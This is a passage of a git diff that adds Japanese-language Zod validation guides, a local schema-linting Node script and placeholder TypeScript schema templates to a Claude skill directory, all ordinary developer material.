+type Event = z.infer<typeof eventSchema>;
+// → { type: 'click'; x: number; y: number } | { type: 'scroll'; scrollY: number } | { type: 'keypress'; key: string }
+```
+
+## スキーマ合成パターン
+
+### 拡張 (extend)
+
+```typescript
+const baseSchema = z.object({
+  id: z.string().uuid(),
+  createdAt: z.coerce.date(),
+});
+
+const userSchema = baseSchema.extend({
+  email: z.string().email(),
+  name: z.string(),
+});
+```
+
+### マージ (merge)
+
+```typescript
+const schemaA = z.object({ a: z.string() });
+const schemaB = z.object({ b: z.number() });
+
+const mergedSchema = schemaA.merge(schemaB);
+// → { a: string; b: number }
+```
+
+### 選択と除外
+
+```typescript
+const fullUserSchema = z.object({
+  id: z.string(),
+  email: z.string(),
+  password: z.string(),
+  name: z.string(),
+  createdAt: z.date(),
+});
+
+// 選択
+const loginSchema = fullUserSchema.pick({
+  email: true,
+  password: true,
+});
+
+// 除外
+const publicUserSchema = fullUserSchema.omit({
+  password: true,
+});
+
+// 部分的（すべてオプショナル）
+const updateUserSchema = fullUserSchema.partial();
+
+// 必須化
+const requiredSchema = updateUserSchema.required();
+
+// 深い部分的
+const deepPartialSchema = fullUserSchema.deepPartial();
+```
+
+## レコード・マップパターン
+
+```typescript
+// キーと値の型を指定
+const stringRecord = z.record(z.string());
+// → Record<string, string>
+
+const typedRecord = z.record(z.string(), z.number());
+// → Record<string, number>
+
+// キーの制約
+const enumKeyRecord = z.record(
+  z.enum(['a', 'b', 'c']),
+  z.number()
+);
+```
+
+## 再帰型パターン
+
+```typescript
+// 自己参照型
+interface Category {
+  name: string;
+  children?: Category[];
+}
+
+const categorySchema: z.ZodType<Category> = z.lazy(() =>
+  z.object({
+    name: z.string(),
+    children: z.array(categorySchema).optional(),
+  })
+);
+
+// JSON型
+type Json = string | number | boolean | null | Json[] | { [key: string]: Json };
+
+const jsonSchema: z.ZodType<Json> = z.lazy(() =>
+  z.union([
+    z.string(),
+    z.number(),
+    z.boolean(),
+    z.null(),
+    z.array(jsonSchema),
+    z.record(jsonSchema),
+  ])
+);
+```
+
+## デフォルト値パターン
+
+```typescript
+const configSchema = z.object({
+  // デフォルト値
+  timeout: z.number().default(5000),
+  retries: z.number().default(3),
+
+  // 動的デフォルト
+  id: z.string().default(() => crypto.randomUUID()),
+  createdAt: z.date().default(() => new Date()),
+
+  // オプショナルとデフォルトの組み合わせ
+  options: z.object({
+    verbose: z.boolean(),
+  }).optional().default({ verbose: false }),
+});
+```
+
+## ベストプラクティス
+
+### 1. スキーマの再利用性
+
+```typescript
+// ✅ 再利用可能な基本パーツを定義
+const emailSchema = z.string().email();
+const passwordSchema = z.string().min(8);
+const uuidSchema = z.string().uuid();
+
+// 基本エンティティスキーマ
+const baseEntitySchema = z.object({
+  id: uuidSchema,
+  createdAt: z.coerce.date(),
+  updatedAt: z.coerce.date(),
+});
+
+// 機能固有スキーマで再利用
+const userSchema = baseEntitySchema.extend({
+  email: emailSchema,
+  password: passwordSchema,
+});
+```
+
+### 2. ブランド型による型安全性強化
+
+```typescript
+// ブランド型で異なるID型を区別
+const userIdSchema = z.string().uuid().brand<'UserId'>();
+const postIdSchema = z.string().uuid().brand<'PostId'>();
+
+type UserId = z.infer<typeof userIdSchema>;
+type PostId = z.infer<typeof postIdSchema>;
+
+// 型エラー: UserIdとPostIdは異なる型
+// const userId: UserId = postId; // Error
+```
+
+### 3. 入力型と出力型の分離
+
+```typescript
+const userSchema = z.object({
+  name: z.string().transform((s) => s.trim()),
+  age: z.coerce.number(),
+});
+
+// 入力型（変換前）
+type UserInput = z.input<typeof userSchema>;
+// → { name: string; age: unknown }
+
+// 出力型（変換後）
+type UserOutput = z.output<typeof userSchema>;
+// → { name: string; age: number }
+```
+
+## アンチパターン
+
+### 避けるべき実装
+
+```typescript
+// ❌ any/unknownの乱用
+const badSchema = z.object({
+  data: z.any(), // 型安全性が失われる
+});
+
+// ❌ 過度に複雑なカスタムバリデーション
+const overComplexSchema = z.string().refine((s) => {
+  // 複雑なロジックはスキーマの外に出す
+  return someComplexValidation(s);
+});
+
+// ❌ 深すぎるネスト
+const deepNestedSchema = z.object({
+  a: z.object({
+    b: z.object({
+      c: z.object({
+        d: z.object({
+          // フラット化を検討
+        }),
+      }),
+    }),
+  }),
+});
+
+// ❌ 重複したスキーマ定義
+const schema1 = z.object({ email: z.string().email() });
+const schema2 = z.object({ email: z.string().email() }); // 再利用すべき
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/zod-validation/resources/type-inference-guide.md
+++ b/.claude/skills/zod-validation/resources/type-inference-guide.md
@@ -1,0 +1,402 @@
+# 型推論ガイド
+
+## 概要
+
+Zodの強力な型推論機能を活用して、ランタイムバリデーションとコンパイル時の型安全性を
+同時に実現する方法を解説します。
+
+## 基本的な型推論
+
+### z.infer の使用
+
+```typescript
+import { z } from 'zod';
+
+// スキーマ定義
+const userSchema = z.object({
+  id: z.string().uuid(),
+  email: z.string().email(),
+  age: z.number().int().positive().optional(),
+  roles: z.array(z.enum(['admin', 'user', 'guest'])),
+});
+
+// 型推論
+type User = z.infer<typeof userSchema>;
+/*
+type User = {
+  id: string;
+  email: string;
+  age?: number | undefined;
+  roles: ('admin' | 'user' | 'guest')[];
+}
+*/
+```
+
+### 入力型と出力型の分離
+
+```typescript
+const transformSchema = z.object({
+  name: z.string().transform((s) => s.trim().toLowerCase()),
+  birthYear: z.string().transform((s) => parseInt(s, 10)),
+  createdAt: z.coerce.date(),
+});
+
+// 入力型（変換前の型）
+type TransformInput = z.input<typeof transformSchema>;
+/*
+type TransformInput = {
+  name: string;
+  birthYear: string;
+  createdAt: string | number | Date;
+}
+*/
+
+// 出力型（変換後の型）
+type TransformOutput = z.output<typeof transformSchema>;
+/*
+type TransformOutput = {
+  name: string;
+  birthYear: number;
+  createdAt: Date;
+}
+*/
+
+// z.infer は z.output のエイリアス
+type InferredType = z.infer<typeof transformSchema>;
+// → TransformOutput と同じ
+```
+
+## 高度な型推論パターン
+
+### ジェネリック関数での使用
+
+```typescript
+// バリデーション関数をジェネリック化
+function validate<T extends z.ZodSchema>(
+  schema: T,
+  data: unknown
+): z.infer<T> {
+  return schema.parse(data);
+}
+
+// 使用例
+const user = validate(userSchema, rawData);
+// user の型は自動的に User 型として推論される
+
+// 安全な解析版
+function safeValidate<T extends z.ZodSchema>(
+  schema: T,
+  data: unknown
+): z.SafeParseReturnType<z.input<T>, z.output<T>> {
+  return schema.safeParse(data);
+}
+```
+
+### 条件付き型との組み合わせ
+
+```typescript
+// 条件付きスキーマの型推論
+type SchemaType<S extends z.ZodSchema> = z.infer<S>;
+
+// 配列要素の型を取得
+type ArrayElement<S extends z.ZodArray<z.ZodTypeAny>> =
+  S extends z.ZodArray<infer E> ? z.infer<E> : never;
+
+const numbersSchema = z.array(z.number());
+type NumberElement = ArrayElement<typeof numbersSchema>;
+// → number
+```
+
+### オブジェクトスキーマの部分型
+
+```typescript
+const fullSchema = z.object({
+  id: z.string(),
+  name: z.string(),
+  email: z.string().email(),
+  password: z.string(),
+  createdAt: z.date(),
+});
+
+// Pick による部分型
+const loginSchema = fullSchema.pick({ email: true, password: true });
+type LoginInput = z.infer<typeof loginSchema>;
+// → { email: string; password: string }
+
+// Omit による部分型
+const publicSchema = fullSchema.omit({ password: true });
+type PublicUser = z.infer<typeof publicSchema>;
+// → { id: string; name: string; email: string; createdAt: Date }
+
+// Partial による全オプショナル化
+const updateSchema = fullSchema.partial();
+type UpdateInput = z.infer<typeof updateSchema>;
+// → { id?: string; name?: string; ... } （すべてオプショナル）
+
+// Required による全必須化
+const requiredSchema = updateSchema.required();
+type RequiredInput = z.infer<typeof requiredSchema>;
+// → 元の型に戻る
+```
+
+## Discriminated Union の型推論
+
+### 基本的な使用法
+
+```typescript
+const resultSchema = z.discriminatedUnion('status', [
+  z.object({
+    status: z.literal('success'),
+    data: z.object({
+      id: z.string(),
+      value: z.number(),
+    }),
+  }),
+  z.object({
+    status: z.literal('error'),
+    error: z.object({
+      code: z.string(),
+      message: z.string(),
+    }),
+  }),
+]);
+
+type Result = z.infer<typeof resultSchema>;
+/*
+type Result =
+  | { status: 'success'; data: { id: string; value: number } }
+  | { status: 'error'; error: { code: string; message: string } };
+*/
+
+// 型ガードとして使用
+function handleResult(result: Result) {
+  if (result.status === 'success') {
+    // TypeScript は result.data にアクセス可能と認識
+    console.log(result.data.id);
+  } else {
+    // result.status === 'error' の場合
+    console.log(result.error.message);
+  }
+}
+```
+
+### 複数の判別フィールド
+
+```typescript
+// APIレスポンスの型付け
+const apiResponseSchema = z.discriminatedUnion('type', [
+  z.object({
+    type: z.literal('user'),
+    payload: z.object({
+      userId: z.string(),
+      email: z.string(),
+    }),
+  }),
+  z.object({
+    type: z.literal('product'),
+    payload: z.object({
+      productId: z.string(),
+      price: z.number(),
+    }),
+  }),
+  z.object({
+    type: z.literal('order'),
+    payload: z.object({
+      orderId: z.string(),
+      items: z.array(z.object({
+        productId: z.string(),
+        quantity: z.number(),
+      })),
+    }),
+  }),
+]);
+
+type ApiResponse = z.infer<typeof apiResponseSchema>;
+```
+
+## 再帰型の型推論
+
+### 基本的な再帰型
+
+```typescript
+// 型を先に定義
+interface Category {
+  id: string;
+  name: string;
+  children?: Category[];
+}
+
+// ZodType を使用して型を明示
+const categorySchema: z.ZodType<Category> = z.lazy(() =>
+  z.object({
+    id: z.string(),
+    name: z.string(),
+    children: z.array(categorySchema).optional(),
+  })
+);
+
+// 型推論
+type CategoryType = z.infer<typeof categorySchema>;
+// → Category インターフェースと一致
+```
+
+### 相互再帰
+
+```typescript
+interface Person {
+  name: string;
+  friends: Person[];
+  bestFriend?: Person;
+}
+
+const personSchema: z.ZodType<Person> = z.lazy(() =>
+  z.object({
+    name: z.string(),
+    friends: z.array(personSchema),
+    bestFriend: personSchema.optional(),
+  })
+);
+```
+
+## ブランド型による型安全性強化
+
+### ブランド型の定義
+
+```typescript
+// 異なるIDを型レベルで区別
+const userIdSchema = z.string().uuid().brand<'UserId'>();
+const postIdSchema = z.string().uuid().brand<'PostId'>();
+
+type UserId = z.infer<typeof userIdSchema>;
+type PostId = z.infer<typeof postIdSchema>;
+
+// 関数シグネチャで型安全性を確保
+function getUser(id: UserId): Promise<User> {
+  // ...
+}
+
+function getPost(id: PostId): Promise<Post> {
+  // ...
+}
+
+// 使用例
+const userId = userIdSchema.parse('123e4567-e89b-12d3-a456-426614174000');
+const postId = postIdSchema.parse('987fcdeb-51a2-3c4d-b5e6-789012345678');
+
+getUser(userId);  // ✅ OK
+getUser(postId);  // ❌ 型エラー: PostId は UserId に代入できない
+```
+
+### 名目型の実現
+
+```typescript
+// メールアドレスのブランド型
+const emailSchema = z.string().email().brand<'Email'>();
+type Email = z.infer<typeof emailSchema>;
+
+// 正の整数のブランド型
+const positiveIntSchema = z.number().int().positive().brand<'PositiveInt'>();
+type PositiveInt = z.infer<typeof positiveIntSchema>;
+
+// 通貨金額のブランド型
+const moneySchema = z.number().nonnegative().brand<'Money'>();
+type Money = z.infer<typeof moneySchema>;
+```
+
+## 型推論のベストプラクティス
+
+### 1. スキーマと型を一元管理
+
+```typescript
+// ✅ スキーマから型を導出（単一の真実の源）
+export const userSchema = z.object({
+  id: z.string().uuid(),
+  email: z.string().email(),
+  name: z.string(),
+});
+export type User = z.infer<typeof userSchema>;
+
+// ❌ スキーマと型を別々に定義（不整合のリスク）
+export interface BadUser {
+  id: string;
+  email: string;
+  name: string;
+}
+export const badUserSchema = z.object({
+  // 手動で同期する必要がある
+});
+```
+
+### 2. エクスポート戦略
+
+```typescript
+// schema.ts
+import { z } from 'zod';
+
+// スキーマをエクスポート
+export const userSchema = z.object({ /* ... */ });
+export const postSchema = z.object({ /* ... */ });
+
+// 型もエクスポート
+export type User = z.infer<typeof userSchema>;
+export type Post = z.infer<typeof postSchema>;
+
+// 使用側
+import { userSchema, User, postSchema, Post } from './schema';
+```
+
+### 3. 型アサーションの回避
+
+```typescript
+// ❌ 型アサーションは避ける
+const user = data as User;
+
+// ✅ スキーマでバリデーション
+const user = userSchema.parse(data);
+
+// ✅ 安全な解析
+const result = userSchema.safeParse(data);
+if (result.success) {
+  const user = result.data; // 型が保証される
+}
+```
+
+## 型推論のトラブルシューティング
+
+### 循環参照エラー
+
+```typescript
+// ❌ 直接の自己参照はエラー
+const badSchema = z.object({
+  children: z.array(badSchema), // Error
+});
+
+// ✅ z.lazy() を使用
+const goodSchema: z.ZodType<TreeNode> = z.lazy(() =>
+  z.object({
+    children: z.array(goodSchema),
+  })
+);
+```
+
+### 型の絞り込みが効かない場合
+
+```typescript
+// union の場合は discriminatedUnion を検討
+const schema = z.union([
+  z.object({ type: z.literal('a'), dataA: z.string() }),
+  z.object({ type: z.literal('b'), dataB: z.number() }),
+]);
+
+// ✅ discriminatedUnion で型の絞り込みが効く
+const betterSchema = z.discriminatedUnion('type', [
+  z.object({ type: z.literal('a'), dataA: z.string() }),
+  z.object({ type: z.literal('b'), dataB: z.number() }),
+]);
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/zod-validation/scripts/validate-schema.mjs
+++ b/.claude/skills/zod-validation/scripts/validate-schema.mjs
@@ -1,0 +1,243 @@
+#!/usr/bin/env node
+/**
+ * Zodスキーマファイルの検証スクリプト
+ *
+ * 使用方法:
+ *   node validate-schema.mjs <schema.ts>
+ *
+ * 検証項目:
+ *   - 必須エクスポート（スキーマと型）の存在
+ *   - 命名規則の遵守
+ *   - 型推論の使用
+ *   - セキュリティパターンの存在
+ */
+
+import { readFile } from 'fs/promises';
+import { existsSync } from 'fs';
+import path from 'path';
+
+// 検証結果
+const results = {
+  errors: [],
+  warnings: [],
+  info: [],
+};
+
+// 検証ルール
+const rules = {
+  // 必須パターン
+  required: {
+    zodImport: {
+      pattern: /import\s+{\s*z\s*}\s+from\s+['"]zod['"]/,
+      message: 'Zodのインポートが見つかりません: import { z } from "zod"',
+    },
+    schemaExport: {
+      pattern: /export\s+(const|let)\s+\w+Schema\s*=/,
+      message: 'スキーマのエクスポートが見つかりません（例: export const userSchema = ...）',
+    },
+    typeInference: {
+      pattern: /z\.infer<typeof\s+\w+Schema>/,
+      message: '型推論（z.infer<typeof ...>）を使用してください',
+    },
+  },
+
+  // 推奨パターン
+  recommended: {
+    typeExport: {
+      pattern: /export\s+type\s+\w+\s*=\s*z\.infer/,
+      message: '推論した型もエクスポートすることを推奨します',
+    },
+    errorMessages: {
+      pattern: /\.(min|max|email|url|uuid)\([^)]*,?\s*['"][^'"]+['"]\s*\)/,
+      message: 'カスタムエラーメッセージの使用を推奨します',
+    },
+  },
+
+  // セキュリティ関連
+  security: {
+    inputValidation: {
+      pattern: /\.(min|max|length)\(/,
+      message: '入力長の制限がありません。DoS対策として長さ制限を追加してください',
+      invert: true, // パターンが見つからない場合に警告
+    },
+    noAny: {
+      pattern: /z\.any\(\)/,
+      message: 'z.any() の使用は型安全性を損ないます。具体的な型を指定してください',
+      invert: false, // パターンが見つかった場合に警告
+    },
+    noUnknown: {
+      pattern: /z\.unknown\(\)(?!\.)/,
+      message: 'z.unknown() は追加の検証なしで使用しないでください',
+      invert: false,
+    },
+  },
+
+  // 命名規則
+  naming: {
+    schemaName: {
+      pattern: /const\s+(\w+)Schema\s*=/g,
+      validator: (matches) => {
+        const invalidNames = [];
+        for (const match of matches) {
+          const name = match[1];
+          if (!/^[a-z][a-zA-Z0-9]*$/.test(name)) {
+            invalidNames.push(name);
+          }
+        }
+        return invalidNames.length === 0
+          ? null
+          : `スキーマ名はcamelCaseで始めてください: ${invalidNames.join(', ')}`;
+      },
+    },
+  },
+};
+
+/**
+ * ファイルを検証
+ */
+async function validateFile(filePath) {
+  console.log(`\n📄 検証中: ${filePath}\n`);
+
+  // ファイル存在チェック
+  if (!existsSync(filePath)) {
+    results.errors.push(`ファイルが見つかりません: ${filePath}`);
+    return;
+  }
+
+  // ファイル拡張子チェック
+  const ext = path.extname(filePath);
+  if (!['.ts', '.tsx'].includes(ext)) {
+    results.errors.push(`TypeScriptファイル（.ts, .tsx）を指定してください: ${filePath}`);
+    return;
+  }
+
+  // ファイル読み込み
+  const content = await readFile(filePath, 'utf-8');
+  const lines = content.split('\n');
+
+  // 必須パターンチェック
+  console.log('🔍 必須パターンをチェック中...');
+  for (const [name, rule] of Object.entries(rules.required)) {
+    if (!rule.pattern.test(content)) {
+      results.errors.push(`[必須] ${rule.message}`);
+    } else {
+      results.info.push(`✅ ${name}: OK`);
+    }
+  }
+
+  // 推奨パターンチェック
+  console.log('🔍 推奨パターンをチェック中...');
+  for (const [name, rule] of Object.entries(rules.recommended)) {
+    if (!rule.pattern.test(content)) {
+      results.warnings.push(`[推奨] ${rule.message}`);
+    } else {
+      results.info.push(`✅ ${name}: OK`);
+    }
+  }
+
+  // セキュリティチェック
+  console.log('🔍 セキュリティパターンをチェック中...');
+  for (const [name, rule] of Object.entries(rules.security)) {
+    const found = rule.pattern.test(content);
+    if (rule.invert) {
+      // パターンが見つからない場合に警告
+      if (!found) {
+        results.warnings.push(`[セキュリティ] ${rule.message}`);
+      }
+    } else {
+      // パターンが見つかった場合に警告
+      if (found) {
+        results.warnings.push(`[セキュリティ] ${rule.message}`);
+      }
+    }
+  }
+
+  // 命名規則チェック
+  console.log('🔍 命名規則をチェック中...');
+  for (const [name, rule] of Object.entries(rules.naming)) {
+    if (rule.validator) {
+      const matches = [...content.matchAll(rule.pattern)];
+      const error = rule.validator(matches);
+      if (error) {
+        results.warnings.push(`[命名規則] ${error}`);
+      }
+    }
+  }
+
+  // 行数チェック
+  if (lines.length > 500) {
+    results.warnings.push(`[構造] ファイルが${lines.length}行あります。分割を検討してください（推奨: 500行以下）`);
+  }
+
+  // 複雑なネストのチェック
+  const deepNestMatch = content.match(/z\.object\(\{[\s\S]*z\.object\(\{[\s\S]*z\.object\(\{[\s\S]*z\.object\(/);
+  if (deepNestMatch) {
+    results.warnings.push('[構造] 深いネスト（4層以上）が検出されました。フラット化を検討してください');
+  }
+}
+
+/**
+ * 結果を表示
+ */
+function displayResults() {
+  console.log('\n' + '='.repeat(60));
+  console.log('📊 検証結果');
+  console.log('='.repeat(60));
+
+  if (results.errors.length > 0) {
+    console.log('\n❌ エラー:');
+    results.errors.forEach((e) => console.log(`   - ${e}`));
+  }
+
+  if (results.warnings.length > 0) {
+    console.log('\n⚠️  警告:');
+    results.warnings.forEach((w) => console.log(`   - ${w}`));
+  }
+
+  if (results.info.length > 0) {
+    console.log('\nℹ️  情報:');
+    results.info.forEach((i) => console.log(`   - ${i}`));
+  }
+
+  console.log('\n' + '-'.repeat(60));
+  console.log(`📈 サマリー: ${results.errors.length} エラー, ${results.warnings.length} 警告`);
+
+  if (results.errors.length === 0) {
+    console.log('✅ 検証に合格しました！\n');
+    return 0;
+  } else {
+    console.log('❌ 検証に失敗しました。エラーを修正してください。\n');
+    return 1;
+  }
+}
+
+// メイン処理
+async function main() {
+  const args = process.argv.slice(2);
+
+  if (args.length === 0) {
+    console.log(`
+使用方法: node validate-schema.mjs <schema.ts>
+
+オプション:
+  <schema.ts>  検証するZodスキーマファイルのパス
+
+例:
+  node validate-schema.mjs src/features/user/schema.ts
+  node validate-schema.mjs ./schema.ts
+`);
+    process.exit(1);
+  }
+
+  for (const filePath of args) {
+    await validateFile(filePath);
+  }
+
+  const exitCode = displayResults();
+  process.exit(exitCode);
+}
+
+main().catch((error) => {
+  console.error('予期せぬエラーが発生しました:', error);
+  process.exit(1);
+});

--- a/.claude/skills/zod-validation/templates/api-schema-template.ts
+++ b/.claude/skills/zod-validation/templates/api-schema-template.ts
@@ -1,0 +1,227 @@
+/**
+ * {{ENDPOINT_NAME}} API スキーマ定義
+ *
+ * @description {{DESCRIPTION}}
+ * @endpoint {{HTTP_METHOD}} {{ENDPOINT_PATH}}
+ * @see {{API_DOC_PATH}}
+ */
+import { z } from 'zod';
+
+// ============================================================
+// 共通定義
+// ============================================================
+
+/** 標準エラーレスポンススキーマ */
+export const apiErrorSchema = z.object({
+  success: z.literal(false),
+  error: z.object({
+    code: z.string().describe('エラーコード（例: ERR_1001_INVALID_EMAIL）'),
+    message: z.string().describe('ユーザー向けエラーメッセージ'),
+    details: z.array(z.object({
+      field: z.string().describe('エラーが発生したフィールド'),
+      message: z.string().describe('フィールド固有のエラーメッセージ'),
+    })).optional().describe('フィールドごとの詳細エラー'),
+    retryable: z.boolean().default(false).describe('リトライ可能か'),
+  }),
+});
+
+export type ApiError = z.infer<typeof apiErrorSchema>;
+
+/** 標準成功レスポンススキーマのファクトリ */
+export function createSuccessResponseSchema<T extends z.ZodTypeAny>(dataSchema: T) {
+  return z.object({
+    success: z.literal(true),
+    data: dataSchema,
+  });
+}
+
+// ============================================================
+// リクエストスキーマ
+// ============================================================
+
+/**
+ * リクエストボディスキーマ
+ */
+export const {{endpointName}}RequestBodySchema = z.object({
+  // === 必須フィールド ===
+  name: z.string()
+    .min(1, '名前は必須です')
+    .max(100, '名前は100文字以内で入力してください')
+    .describe('名前'),
+
+  email: z.string()
+    .email('有効なメールアドレスを入力してください')
+    .describe('メールアドレス'),
+
+  // === オプショナルフィールド ===
+  phone: z.string()
+    .regex(/^[0-9-]+$/, '電話番号は数字とハイフンのみ使用可能です')
+    .optional()
+    .describe('電話番号'),
+
+  // === 列挙型 ===
+  type: z.enum(['individual', 'corporate'], {
+    errorMap: () => ({ message: 'individual または corporate を指定してください' }),
+  }).describe('顧客タイプ'),
+
+  // === ネストされたオブジェクト ===
+  address: z.object({
+    street: z.string().min(1, '住所は必須です'),
+    city: z.string().min(1, '市区町村は必須です'),
+    postalCode: z.string().regex(/^\d{3}-\d{4}$/, '郵便番号はXXX-XXXX形式で入力してください'),
+    country: z.string().length(2, '国コードは2文字で入力してください').default('JP'),
+  }).optional().describe('住所'),
+
+  // === 配列 ===
+  tags: z.array(z.string().max(50))
+    .max(10, 'タグは10個まで設定可能です')
+    .default([])
+    .describe('タグ'),
+});
+
+export type {{ENDPOINT_NAME}}RequestBody = z.infer<typeof {{endpointName}}RequestBodySchema>;
+
+/**
+ * クエリパラメータスキーマ
+ */
+export const {{endpointName}}QuerySchema = z.object({
+  // 検索
+  q: z.string().max(100).optional().describe('検索キーワード'),
+
+  // フィルター
+  type: z.enum(['individual', 'corporate']).optional().describe('タイプフィルター'),
+  status: z.enum(['active', 'inactive']).optional().describe('ステータスフィルター'),
+
+  // 日付範囲
+  from: z.string().datetime().optional().describe('開始日時（ISO 8601）'),
+  to: z.string().datetime().optional().describe('終了日時（ISO 8601）'),
+
+  // ページネーション
+  page: z.coerce.number().int().positive().default(1).describe('ページ番号'),
+  limit: z.coerce.number().int().min(1).max(100).default(20).describe('取得件数'),
+
+  // ソート
+  sort: z.enum(['createdAt', 'updatedAt', 'name']).default('createdAt').describe('ソートフィールド'),
+  order: z.enum(['asc', 'desc']).default('desc').describe('ソート順'),
+});
+
+export type {{ENDPOINT_NAME}}Query = z.infer<typeof {{endpointName}}QuerySchema>;
+
+/**
+ * パスパラメータスキーマ
+ */
+export const {{endpointName}}ParamsSchema = z.object({
+  id: z.string().uuid('有効なIDを指定してください').describe('リソースID'),
+});
+
+export type {{ENDPOINT_NAME}}Params = z.infer<typeof {{endpointName}}ParamsSchema>;
+
+// ============================================================
+// レスポンススキーマ
+// ============================================================
+
+/**
+ * 単一リソースレスポンススキーマ
+ */
+export const {{endpointName}}ResponseSchema = z.object({
+  id: z.string().uuid().describe('ID'),
+  name: z.string().describe('名前'),
+  email: z.string().email().describe('メールアドレス'),
+  phone: z.string().nullable().describe('電話番号'),
+  type: z.enum(['individual', 'corporate']).describe('タイプ'),
+  address: z.object({
+    street: z.string(),
+    city: z.string(),
+    postalCode: z.string(),
+    country: z.string(),
+  }).nullable().describe('住所'),
+  tags: z.array(z.string()).describe('タグ'),
+  createdAt: z.string().datetime().describe('作成日時'),
+  updatedAt: z.string().datetime().describe('更新日時'),
+});
+
+export type {{ENDPOINT_NAME}}Response = z.infer<typeof {{endpointName}}ResponseSchema>;
+
+/**
+ * リスト取得レスポンススキーマ
+ */
+export const {{endpointName}}ListResponseSchema = z.object({
+  items: z.array({{endpointName}}ResponseSchema).describe('リソースリスト'),
+  pagination: z.object({
+    total: z.number().int().nonnegative().describe('総件数'),
+    page: z.number().int().positive().describe('現在のページ'),
+    limit: z.number().int().positive().describe('1ページあたりの件数'),
+    pages: z.number().int().positive().describe('総ページ数'),
+    hasNext: z.boolean().describe('次のページの有無'),
+    hasPrev: z.boolean().describe('前のページの有無'),
+  }).describe('ページネーション情報'),
+});
+
+export type {{ENDPOINT_NAME}}ListResponse = z.infer<typeof {{endpointName}}ListResponseSchema>;
+
+/**
+ * 作成レスポンススキーマ
+ */
+export const {{endpointName}}CreateResponseSchema = createSuccessResponseSchema(
+  {{endpointName}}ResponseSchema
+);
+
+export type {{ENDPOINT_NAME}}CreateResponse = z.infer<typeof {{endpointName}}CreateResponseSchema>;
+
+/**
+ * 削除レスポンススキーマ
+ */
+export const {{endpointName}}DeleteResponseSchema = z.object({
+  success: z.literal(true),
+  data: z.object({
+    id: z.string().uuid().describe('削除されたリソースのID'),
+    deletedAt: z.string().datetime().describe('削除日時'),
+  }),
+});
+
+export type {{ENDPOINT_NAME}}DeleteResponse = z.infer<typeof {{endpointName}}DeleteResponseSchema>;
+
+// ============================================================
+// バリデーションヘルパー
+// ============================================================
+
+/**
+ * リクエストボディのバリデーション
+ */
+export function validate{{ENDPOINT_NAME}}RequestBody(data: unknown): {{ENDPOINT_NAME}}RequestBody {
+  return {{endpointName}}RequestBodySchema.parse(data);
+}
+
+/**
+ * リクエストボディの安全なバリデーション
+ */
+export function safeValidate{{ENDPOINT_NAME}}RequestBody(
+  data: unknown
+): z.SafeParseReturnType<unknown, {{ENDPOINT_NAME}}RequestBody> {
+  return {{endpointName}}RequestBodySchema.safeParse(data);
+}
+
+/**
+ * クエリパラメータのバリデーション
+ */
+export function validate{{ENDPOINT_NAME}}Query(data: unknown): {{ENDPOINT_NAME}}Query {
+  return {{endpointName}}QuerySchema.parse(data);
+}
+
+/**
+ * ZodErrorを標準エラーレスポンスに変換
+ */
+export function formatZodError(error: z.ZodError): ApiError {
+  return {
+    success: false,
+    error: {
+      code: 'ERR_VALIDATION',
+      message: 'バリデーションエラーが発生しました',
+      details: error.errors.map((err) => ({
+        field: err.path.join('.'),
+        message: err.message,
+      })),
+      retryable: false,
+    },
+  };
+}

--- a/.claude/skills/zod-validation/templates/schema-template.ts
+++ b/.claude/skills/zod-validation/templates/schema-template.ts
@@ -1,0 +1,173 @@
+/**
+ * {{FEATURE_NAME}} スキーマ定義
+ *
+ * @description {{DESCRIPTION}}
+ * @see {{SPEC_DOC_PATH}}
+ */
+import { z } from 'zod';
+
+// ============================================================
+// 共通スキーマパーツ（再利用可能な基本型）
+// ============================================================
+
+/** UUID形式のID */
+const uuidSchema = z.string().uuid('有効なUUID形式で入力してください');
+
+/** タイムスタンプ（ISO 8601形式の文字列から日付に変換） */
+const timestampSchema = z.coerce.date();
+
+/** 非空文字列 */
+const nonEmptyStringSchema = z.string().min(1, '必須項目です');
+
+// ============================================================
+// 入力スキーマ（外部からの入力用）
+// ============================================================
+
+/**
+ * {{FEATURE_NAME}}作成入力スキーマ
+ */
+export const create{{FEATURE_NAME}}InputSchema = z.object({
+  // 必須フィールド
+  name: nonEmptyStringSchema
+    .max(100, '100文字以内で入力してください')
+    .describe('名前'),
+
+  // オプショナルフィールド
+  description: z.string()
+    .max(500, '500文字以内で入力してください')
+    .optional()
+    .describe('説明'),
+
+  // 列挙型フィールド
+  status: z.enum(['active', 'inactive', 'pending'], {
+    errorMap: () => ({ message: 'active, inactive, pending のいずれかを指定してください' }),
+  }).default('pending').describe('ステータス'),
+
+  // 配列フィールド
+  tags: z.array(z.string().max(50))
+    .max(10, 'タグは10個まで設定可能です')
+    .default([])
+    .describe('タグ'),
+});
+
+/**
+ * {{FEATURE_NAME}}作成入力型
+ */
+export type Create{{FEATURE_NAME}}Input = z.infer<typeof create{{FEATURE_NAME}}InputSchema>;
+
+/**
+ * {{FEATURE_NAME}}更新入力スキーマ（部分更新）
+ */
+export const update{{FEATURE_NAME}}InputSchema = create{{FEATURE_NAME}}InputSchema
+  .partial()
+  .extend({
+    id: uuidSchema.describe('更新対象のID'),
+  });
+
+/**
+ * {{FEATURE_NAME}}更新入力型
+ */
+export type Update{{FEATURE_NAME}}Input = z.infer<typeof update{{FEATURE_NAME}}InputSchema>;
+
+// ============================================================
+// 出力スキーマ（レスポンス用）
+// ============================================================
+
+/**
+ * {{FEATURE_NAME}}出力スキーマ
+ */
+export const {{featureName}}OutputSchema = z.object({
+  id: uuidSchema.describe('ID'),
+  name: z.string().describe('名前'),
+  description: z.string().nullable().describe('説明'),
+  status: z.enum(['active', 'inactive', 'pending']).describe('ステータス'),
+  tags: z.array(z.string()).describe('タグ'),
+  createdAt: timestampSchema.describe('作成日時'),
+  updatedAt: timestampSchema.describe('更新日時'),
+});
+
+/**
+ * {{FEATURE_NAME}}出力型
+ */
+export type {{FEATURE_NAME}}Output = z.infer<typeof {{featureName}}OutputSchema>;
+
+/**
+ * {{FEATURE_NAME}}リスト出力スキーマ
+ */
+export const {{featureName}}ListOutputSchema = z.object({
+  items: z.array({{featureName}}OutputSchema).describe('{{FEATURE_NAME}}リスト'),
+  total: z.number().int().nonnegative().describe('総件数'),
+  page: z.number().int().positive().describe('現在のページ'),
+  pageSize: z.number().int().positive().describe('ページサイズ'),
+  hasMore: z.boolean().describe('次のページの有無'),
+});
+
